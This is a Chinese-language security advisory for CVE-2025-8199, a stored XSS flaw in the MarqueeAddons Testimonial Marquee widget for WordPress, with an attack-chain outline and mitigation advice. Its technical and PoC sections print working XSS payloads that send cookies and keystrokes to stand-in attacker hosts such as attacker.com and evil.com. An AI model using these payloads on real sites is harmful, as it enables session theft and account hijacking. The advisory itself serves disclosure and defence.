CVE-2025-8199 WordPress MarqueeAddons插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-8199

漏洞类型

存储型XSS

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

MarqueeAddons plugin for WordPress

漏洞概述

CVE-2025-8199是WordPress MarqueeAddons插件中的一个存储型跨站脚本（Stored XSS）漏洞。该插件是一款广受欢迎的Elementor页面构建器扩展插件，为用户提供多种动态内容展示组件，包括轮播、公告和推荐展示等小部件。漏洞存在于插件的Testimonial Marquee（推荐轮播）组件中，源于对用户输入属性的清理不足和输出转义缺失。攻击者利用此漏洞可以在WordPress网站的页面中注入任意JavaScript代码。由于攻击脚本被永久存储在数据库中，所有访问包含恶意代码页面的用户都会执行这些脚本，攻击者可以借此窃取会话Cookie、劫持用户账户、修改页面内容或重定向用户到恶意网站。该漏洞影响所有版本直至2.4.3版本，攻击者需要具备WordPress网站贡献者级别（Contributor）或更高权限账户即可实施攻击。

技术细节

MarqueeAddons插件的Testimonial Marquee小部件在处理用户输入的展示项数据时存在安全缺陷。具体而言，插件接收并存储用户提供的姓名、职位、公司及引用文本等内容时，未对这些输入进行充分的HTML标签过滤和JavaScript代码清理。当包含恶意脚本的内容被保存后，每次页面加载时这些未转义的代码都会作为HTML的一部分被输出到用户浏览器中执行。攻击者只需在创建或编辑Testimonial Marquee组件时，在姓名或引用文本字段中插入如<img src=x onerror=alert(document.cookie)>或<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>等payload，即可实现持久化的恶意脚本植入。由于该脚本存储在数据库中，任何访问相关页面的管理员或访客都会触发执行，形成存储型XSS攻击链。攻击者可能进一步利用窃取的认证会话cookie劫持高权限账户。

攻击链分析

STEP 1

Reconnaissance

攻击者识别目标网站使用的WordPress版本和MarqueeAddons插件版本，确认版本是否在受影响范围内（≤2.4.3）

STEP 2

Authentication

攻击者获取WordPress网站的贡献者（Contributor）或更高权限账户，可通过社会工程、凭证填充或内部人员协助等方式获得

STEP 3

Payload Injection

攻击者登录WordPress后台，使用Elementor页面编辑器创建或编辑包含Testimonial Marquee小部件的页面，在姓名、职位或引用文本等字段中注入恶意JavaScript代码

STEP 4

Persistence

包含XSS payload的内容被保存到WordPress数据库中，形成持久化攻击点，攻击者无需再次操作

STEP 5

Exploitation

当管理员或其他用户访问包含恶意代码的页面时，浏览器执行注入的JavaScript，攻击者可窃取会话Cookie、劫持账户或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-8199 PoC: Stored XSS in MarqueeAddons Testimonial Marquee Widget -->
<!-- Requirements: Contributor+ role access to WordPress admin -->

<!-- Step 1: Create a new Testimonial Marquee widget via Elementor -->
<!-- Step 2: Add a new testimonial item with XSS payload in name field -->

<!-- Payload Example 1: Cookie Theft -->
<script>
  fetch('https://attacker-controlled-site.com/steal?cookie=' + btoa(document.cookie));
</script>

<!-- Payload Example 2: Keylogger -->
<img src=x onerror='document.onkeypress=function(e){fetch("https://attacker.com/k?k="+btoa(e.key))}'>

<!-- Payload Example 3: Session Hijacking -->
<svg/onload=fetch('https://evil.com/exfil?data='+encodeURIComponent(document.cookie))>

<!-- Step 3: Save and publish the page -->
<!-- Step 4: Any user visiting the page will execute the injected JavaScript -->

影响范围

MarqueeAddons for Elementor ≤ 2.4.3

防御指南

临时缓解措施

如果无法立即升级插件，可临时禁用MarqueeAddons插件的Testimonial Marquee功能，或限制该插件仅限管理员使用。同时建议审查近期有编辑页面权限的用户账户，更改所有管理员和编辑账户的密码，并检查服务器访问日志是否存在异常请求模式。